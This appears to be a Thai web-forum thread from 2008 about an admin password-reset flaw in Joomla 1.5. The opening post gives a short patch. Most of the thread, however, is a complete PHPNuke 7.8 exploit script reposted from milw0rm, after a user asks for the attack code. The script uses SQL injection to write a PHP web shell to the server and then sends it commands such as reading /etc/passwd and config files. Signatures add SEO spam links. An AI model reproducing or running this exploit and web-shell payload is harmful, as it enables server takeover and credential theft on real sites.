- Security for Joomla -ใครใช้อยู่กลับไป แก้ไขด่วนจ้า!!!!!

เริ่มโดย Dr.K, 15 สิงหาคม 2008, 12:14:25

หัวข้อก่อนหน้า - หัวข้อถัดไป

0 สมาชิก และ 1 ผู้มาเยือน กำลังดูหัวข้อนี้

Dr.K

วันที่ 14 สค. โดน deface ไปประมาณ 2 ชม. สำหรับ Joomla.org โดนที่ core file ด้วยครับ
งานนี้ ต้องอัพเกรด เป็น 1.5.6
หรือถ้าด่วน กลัวมากๆ ให้ไป patch file

/components/com_user/models/reset.php บริเวณ:

หลังจาก global $mainframe; บรรทัด 113 ของ reset.php
เพิ่ม

if(strlen($token) != 32) {
$this->setError(JText::_('INVALID_TOKEN'));
return false;
}


ด่วน ก่อนจะเป็นรายต่อไป
รายละเอียดคร่าวๆคือ จะมีสคริปต์สามารถแกะ และเปลี่ยน pass ผู้ใช้ที่ id ต่ำที่สุด ซึ่งก้อคือ adminครับ
[direct=https://www.thaihealth.net/blog/seo_doctor/]seo blog[/direct]|[direct=https://netplushost.com]netplushost[/direct]
[direct=https://pattayawebmarketing.com/pattaya-seo]pattaya seo[/direct]
[direct=https://dochost.net]seo hosting[/direct]

userOne

อ้างถึงจาก: Dr.K ใน 15 สิงหาคม 2008, 12:14:25
จะมีสคริปต์สามารถแกะ และเปลี่ยน pass ผู้ใช้ที่ id ต่ำที่สุด ซึ่งก้อคือ adminครับ

อยากได้ script ตัวนี้จังครับ จะเอามาศึกษามีแจกมั้ยครับ  :D

Dr.K

อ้างถึงจาก: userOne ใน 15 สิงหาคม 2008, 12:22:09
อ้างถึงจาก: Dr.K ใน 15 สิงหาคม 2008, 12:14:25
จะมีสคริปต์สามารถแกะ และเปลี่ยน pass ผู้ใช้ที่ id ต่ำที่สุด ซึ่งก้อคือ adminครับ

อยากได้ script ตัวนี้จังครับ จะเอามาศึกษามีแจกมั้ยครับ  :D
จริงๆมันก้อแค่เรียก url บรรทัดเดียวนะ(เดา) ตามที่เคยเจอกะ phpnuke แต่ไม่แน่ใจนะครับ ฟังเขาเล่ามา แต่ของ phpnuke นี่ค้นๆเอาเถอะมีแจกเต็ม
[direct=https://www.thaihealth.net/blog/seo_doctor/]seo blog[/direct]|[direct=https://netplushost.com]netplushost[/direct]
[direct=https://pattayawebmarketing.com/pattaya-seo]pattaya seo[/direct]
[direct=https://dochost.net]seo hosting[/direct]

Dr.K

เอาตัวอย่าง phpnuke มาให้ดู
เด๋วของ joomla คง release ออกมาในตลาดมืด

<?php
#   20.05 23/10/2005                                                           #
#                                                                              #
#   ---phpnuke_78_xpl.php                                                      #
#                                                                              #
#   PHPNuke 7.8 with all security fixes/patches "Downloads","Web_Links" &      #
#   "Your_Account" modules SQL Injection / remote commands execution exploit   #
#   (yet not tested 7.9, but OK...)                                            #
#                                                                              #
#                                 by rgod                                      #
#                      site: http://rgod.altervista.org                        #
#                                                                              #
#   make these changes in php.ini if you have troubles                         #
#   to launch this script:                                                     #
#   allow_call_time_pass_reference = on                                        #
#   register_globals = on                                                      #
#                                                                              #
#   usage: customize for your own pleasure, launch this script from Apache,    #
#   fill requested fields, then go!                                            #
#                                                                              #
#   Sun-Tzu: "Standing on the defensive indicates insufficient strength;       #
#   attacking, a superabundance of strength"                                   #

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout"2);
ob_implicit_flush (1);

echo
'<html><head><title> PHPNuke 7.8   remote  commands  execution </title><meta
http-equiv="Content-Type"  content="text/html; charset=iso-8859-1"> <style
type="text/css"> body { background-color:#111111; SCROLLBAR-ARROW-COLOR:#ffffff;
SCROLLBAR-BASE-COLOR: black;    CURSOR: crosshair;    color:   #1CB081; }    img
{background-color:   #FFFFFF   !important}  input  {background-color:    #303030
!important} option {  background-color:   #303030   !important}         textarea
{background-color: #303030 !important} input {color: #1CB081 !important}  option
{color: #1CB081 !important} textarea {color: #1CB081 !important}        checkbox
{background-color: #303030 !important} select {font-weight: normal;       color:
#1CB081;  background-color:  #303030;}  body  {font-size:  8pt       !important;
background-color:   #111111;   body * {font-size: 8pt !important} h1 {font-size:
0.8em !important}   h2   {font-size:   0.8em    !important} h3 {font-size: 0.8em
!important} h4,h5,h6    {font-size: 0.8em !important}  h1 font {font-size: 0.8em
!important}  h2 font {font-size: 0.8em !important}h3   font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica,  sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica,  sans-serif;
font-weight:bold; font-style: italic;}--></style></head> <body> <p class="Stile6">
PHPNuke 7.8 (possibly prior versions) remote commands execution</p><p    class="
Stile6">a script by rgod at <a href="http://rgod.altervista.org"target="_blank">
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> <form
name="form1"      method="post"   action="'
.$SERVER[PHP_SELF].'?path=value&host=
value&port=value&command=value&proxy=value"><p><input type="text"   name="host">
<span class="Stile5">hostname (ex: www.sitename.com)  </span>   </p> <p>  <input
type="text" name="path"><span class="Stile5">  path ( ex:  /phpnuke/ or just /)
</span></p><p> <input type="text" name="pathtoWWW"><span class="Stile5">    path
to WWW ftom Mysql directory, need this for "...INTO OUTFILE ..." statement
(default: ../../www) </span></p><p><input type="text" name="port" >        <span
class="Stile5"> specify a port other than 80 (default value)</span>      </p><p>
<input type="text" name="command"> <span  class="Stile5">a Unix command ,
example: ls -la  to list directories, cat /etc/passwd to show passwd file,   cat
config.php to see database username and password</span>
</p><p><input type="text" name="proxy"><span class="Stile5">send exploit through
an HTTP proxy (ip:port)</span></p><p><input type="submit"name="Submit"
value="go!"></p></form></td></tr></table></body></html>'
;

function 
show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo 
'<table border="0"><tr>';
while (
$ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if (
$ji==16) {
             
$ji=0;
             
$ci++;
             echo 
"<td>&nbsp;&nbsp;</td>";
             for (
$li=0$li<=15$li++)
                      { echo 
"<td>".$headeri[$li+$ki]."</td>";
    }
            
$ki=$ki+16;
            echo 
"</tr><tr>";
            }
if (
strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo 
"<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for (
$li=1$li<=(16 - (strlen($headeri) % 16)+1); $li++)
                      { echo 
"<td>&nbsp&nbsp</td>";
                       }

for (
$li=$ci*16$li<=strlen($headeri); $li++)
                      { echo 
"<td>".$headeri[$li]."</td>";
    }
echo 
"</tr></table>";
}
$proxy_regex '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function 
sendpacket() //if you have sockets module loaded, 2x speed! if not,load
              //next function to send packets
{
  global 
$proxy$host$port$packet$html$proxy_regex;
  
$socket socket_create(AF_INETSOCK_STREAMSOL_TCP);
  if (
$socket 0) {
                   echo 
"socket_create() failed: reason: " socket_strerror($socket) . "<br>";
                   }
      else
 
  {   $c preg_match($proxy_regex,$proxy);
              if (!
$c) {echo 'Not a valid prozy...';
                        die;
                       }
                    echo 
"OK.<br>";
                    echo 
"Attempting to connect to ".$host." on port ".$port."...<br>";
                    if (
$proxy=='')
   {
     $result socket_connect($socket$host$port);
   }
   else
   {

   $parts =explode(':',$proxy);
                   echo 
'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
   $result socket_connect($socket$parts[0],$parts[1]);
   }
   if ($result 0) {
                                     echo 
"socket_connect() failed.\r\nReason: (".$result.") " socket_strerror($result) . "<br><br>";
                                    }
                       else
                    {
                                     echo 
"OK.<br><br>";
                                     
$html'';
                                     
socket_write($socket$packetstrlen($packet));
                                     echo 
"Reading response:<br>";
                                     while (
$outsocket_read($socket2048)) {$html.=$out;}
                                     echo 
nl2br(htmlentities($html));
                                     echo 
"Closing socket...";
                                     
socket_close($socket);

    }
                  }
}
function 
sendpacketii($packet)
{
global 
$proxy$host$port$html$proxy_regex;
if (
$proxy=='')
           {
$ock=fsockopen(gethostbyname($host),$port);}
             else
           {
   $c preg_match($proxy_regex,$proxy);
              if (!
$c) {echo 'Not a valid prozy...';
                        die;
                       }
   $parts=explode(':',$proxy);
    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) { echo 'No response from proxy...';
die;
       }
   }
fputs($ock,$packet);
if (
$proxy=='')
  {

    
$html='';
    while (!
feof($ock))
      {
        
$html.=fgets($ock);
      }
  }
else
  {
    
$html='';
    while ((!
feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
    {
      
$html.=fread($ock,1);
    }
  }
fclose($ock);
echo 
nl2br(htmlentities($html));
}

function 
execute_commands()
{
global 
$p$host$port$packet$command$html;
$packet="GET ".$p."shell.php?cmd=".urlencode($command)." HTTP/1.1\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Connection: CLose\r\n\r\n";
show($packet);
sendpacketii($packet);
if (
eregi("Hi Master"$html)) {echo "Exploit succeeded..."; die; }
}


if ((
$host<>'') and ($path<>'') and ($command<>''))
{
  
$port=intval(trim($port));
  if (
$port=='') {$port=80;}
  if ((
$path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
  if (
$pathtoWWW=='') {$pathtoWWW="../../www";}
  
#default, path for "INTO OUTFILE <[path][file]>, two dirs up from mysql data directory, change it for
  #different Apache installations
  
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
  echo 
$proxy;
# STEP 1 -> SQL injection in "Your_Account" module... inject a shell
$SQL="'UNION SELECT '<?error_reporting(0);?>
',0,0,0,0,0,0,0,'<?echo \"Hi Master\";ini_set(\"max_execution_time\",0);system(\$_GET[cmd]);die;?>',0 INTO OUTFILE '".$pathtoWWW.$path."shell.php' FROM nuke_users/*";
$data="username=".urlencode($SQL)."&user_password=&redirect=&mode=&f=&t=&op=login";
$packet="POST ".$p."modules.php?name=Your_Account HTTP/1.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.":".$port.$path."modules.php?name=Your_Account\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Lycos_Spider_(T-Rex)\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Cookie: lang=english\r\n\r\n";
$packet.=$data;
show($packet);
//sendpacketii($packet);
execute_commands();

#STEP 2 -> if STEP 1 failed, SQL Injection in "Downloads" module...
//we need to use backticks (shell operators, they are not quotes, some chars like ")" are not permitted in urls...
$SQL="' UNION SELECT '<?echo \'Hi Master\';print `\$_GET[cmd]`;?>' INTO OUTFILE '".$pathtoWWW.$path."shell.php' FROM nuke_downloads_downloads/*";
$packet="GET ".$p."modules.php?name=Downloads&d_op=Add&url=".urlencode($SQL)."&title=what&description=what HTTP/1.1\r\n";
$packet.="User-Agent: SearchExpress Spider0.99\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Connection: CLose\r\n\r\n";
show($packet);
//sendpacketii($packet);
execute_commands();

#STEP 3 -> if STEP 1 & 2 failed, SQL injection in "Web_Links" module...
$SQL="' or 'x'='x' UNION SELECT 0,0,0,0,0,0,'Hi Master<?print `\$_GET[cmd]`;?>',0,0 INTO OUTFILE '".$pathtoWWW.$path."shell.php' FROM nuke_links_newlink/*";
$packet="GET ".$p."modules.php?name=Web_Links&l_op=Add&title=what&description=".urlencode($SQL)."&url=what HTTP/1.1\r\n";
$packet.="User-Agent: Web Link Validator 1.5\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Connection: CLose\r\n\r\n";
show($packet);
sendpacketii($packet);
execute_commands();

//if you are here...
echo 'Exploit failed...';
}
else
{echo 'Fill in requested fields, optionally specify a proxy';}
?>

# milw0rm.com [2005-10-23]



อันนี้ sql injection
แต่ joomla ให้เดา น่าจะ encode command ,shell command หรือ sql injection ไปใน url ไปเลย
ทีเดียวจบ
เดานะ ต้องไปถามคนเก่งอื่นๆ เรื่องนี้ ผมโง่มากอะ
ใครหาเจอหามาให้หน่อยดิ
[direct=https://www.thaihealth.net/blog/seo_doctor/]seo blog[/direct]|[direct=https://netplushost.com]netplushost[/direct]
[direct=https://pattayawebmarketing.com/pattaya-seo]pattaya seo[/direct]
[direct=https://dochost.net]seo hosting[/direct]

userOne


au8ust


barbies55

แบบนี้เราไปแก้ให้แอดมินไม่ใช่คนที่ไอดีต่ำที่สุดได้ป่ะ ให้แฮกเกอร์มันงง เอิ้กก
รับทำเทมเพลท รับโมเทมเพลทให้เข้ากับสคริปต์ต่างๆ


On the Internet, Never One Know You are a Dog.
ผ้าขี้ริ้วห่อทองย่อมเป็นทองฉันใด เอาทองเปลวมาห่อขี้ก็ยังเป็นขี้ฉันนั้น

sutenm

Powered By Sutenm

userOne


ใครมี joomla 15.2 -.3 มั้ยครับ ขอหน่อย ในเว้บไม่มีให้โหลดมั่ง

au8ust

อ้างถึงจาก: userOne ใน 15 สิงหาคม 2008, 12:49:51

ใครมี joomla 15.2 -.3 มั้ยครับ ขอหน่อย ในเว้บไม่มีให้โหลดมั่ง
มี Joomla_1.5.3-Stable-Full_Package.tar.bz2 ครับ ใช้ kw นี้หาใน gg ดู

PornClip

อ้างถึงจาก: userOne ใน 15 สิงหาคม 2008, 12:49:51

ใครมี joomla 15.2 -.3 มั้ยครับ ขอหน่อย ในเว้บไม่มีให้โหลดมั่ง




ไปโหลดเวอร์ 1.5.6 ที่  joomla.org มาใช้เท่านั้นคับ

ถ้าใช้เวอร์ 1.5.x โดนแฮกพาสเวิร์ด  admin  ผ่าน  browser  ได้เลย

ปล.จิงๆไม่ใช่การแฮกด้วยซ้ำ แต่เป็นบั๊กที่ทำให้ผู้ไม่หวังดีแอบเปลี่ยนพาสเวิร์ด admin

ผ่าน Browser  โดยไม่ต้องแฮกเลย

:P


userOne

ลองกับ 1.5.0  ง่ายๆเลยครับพี่น้อง เด๋ยวลองอุดตามพี่หมอบอกก่อน

flukenakrab

[direct=http://www.thaiseoboard.com/index.php/topic,145552.0.html]โฮสติ้งที่ห่วยที่สุดใน 3 โลก Dollar2Host[/direct]

spiceday


inloveshop


sutenm

Powered By Sutenm